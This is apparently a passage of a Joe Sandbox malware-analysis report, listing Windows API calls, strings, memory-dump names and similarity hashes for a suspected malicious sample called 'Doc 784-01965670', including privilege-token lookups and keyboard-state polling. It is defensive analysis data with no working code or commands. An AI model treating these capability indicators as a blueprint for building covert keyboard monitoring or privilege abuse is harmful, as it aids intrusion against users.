• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
• Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
• Opcode Fuzzy Hash: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
• Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 004604B5
• GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
• _wcslen.LIBCMT ref: 00460502
• CharUpperBuffW.USER32(?,00000000), ref: 00460510
• GetClassNameW.USER32(?,?,00000400), ref: 00460589
• GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
• GetClassNameW.USER32(?,?,00000400), ref: 00460606
• GetClassNameW.USER32(?,?,00000400), ref: 0046063E
• GetWindowRect.USER32(?,?), ref: 004606AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
• String ID: ThumbnailClass
• API String ID: 4123061591-1241985126
• Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
• Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
APIs
  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
• DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
• ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
• ImageList_EndDrag.COMCTL32 ref: 0046F583
• ReleaseCapture.USER32 ref: 0046F589
• SetWindowTextW.USER32(?,00000000), ref: 0046F620
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
• String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
• API String ID: 2483343779-2060113733
• Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
• Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
• Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
• Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
• SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
• GetClientRect.USER32(?,?), ref: 0046FEF2
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
• DestroyIcon.USER32(?), ref: 0046FFCC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
• Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
• Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
• Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
APIs
• DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
• Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
• Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
• Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
• Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
APIs
• GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
• OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
• GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
• LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
• LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
• _memcmp.LIBCMT ref: 004394A9
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
Strings
• SeIncreaseQuotaPrivilege, xrefs: 0043946A
• SeAssignPrimaryTokenPrivilege, xrefs: 00439455
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                    • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                    • API String ID: 1446985595-805462909
                                                                                                                                    • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                    • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                    • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                    • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                                    • API String ID: 2907320926-41864084
                                                                                                                                    • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                    • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                                    • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                    • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1932665248-0
                                                                                                                                    • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                                    • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                    • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                                    • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                    • _memset.LIBCMT ref: 004481BA
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 830647256-0
                                                                                                                                    • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                    • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                    • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                    • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                    • DeleteObject.GDI32(004C0000), ref: 0046EB4F
                                                                                                                                    • DestroyIcon.USER32(004F0046), ref: 0046EB67
                                                                                                                                    • DeleteObject.GDI32(00520000), ref: 0046EB7F
                                                                                                                                    • DestroyWindow.USER32(0047004E), ref: 0046EB97
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 802431696-0
                                                                                                                                    • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                    • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                                    • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                    • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00444EC3
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
• Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID: HH
• API String ID: 0-2761332787
• Opcode ID: a328fc3f0c2738e7ee23a6f39de9db46e7d7486e18f94bdfd929d974c39bc96d
• Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
• Opcode Fuzzy Hash: a328fc3f0c2738e7ee23a6f39de9db46e7d7486e18f94bdfd929d974c39bc96d
• Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
• _wcslen.LIBCMT ref: 00450944
• _wcscat.LIBCMT ref: 00450955
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
• Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
• Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
APIs
• _memset.LIBCMT ref: 00448625
• CreateMenu.USER32 ref: 0044863C
• SetMenu.USER32(?,00000000), ref: 0044864C
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
• IsMenu.USER32(?), ref: 004486EB
• CreatePopupMenu.USER32 ref: 004486F5
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
• DrawMenuBar.USER32 ref: 00448742
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
• Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
• Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
• Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
• Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
• GetDlgCtrlID.USER32(00000000), ref: 00469289
• GetParent.USER32 ref: 004692A4
• SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
• GetDlgCtrlID.USER32(00000000), ref: 004692AE
• GetParent.USER32 ref: 004692C7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
• Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
• Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
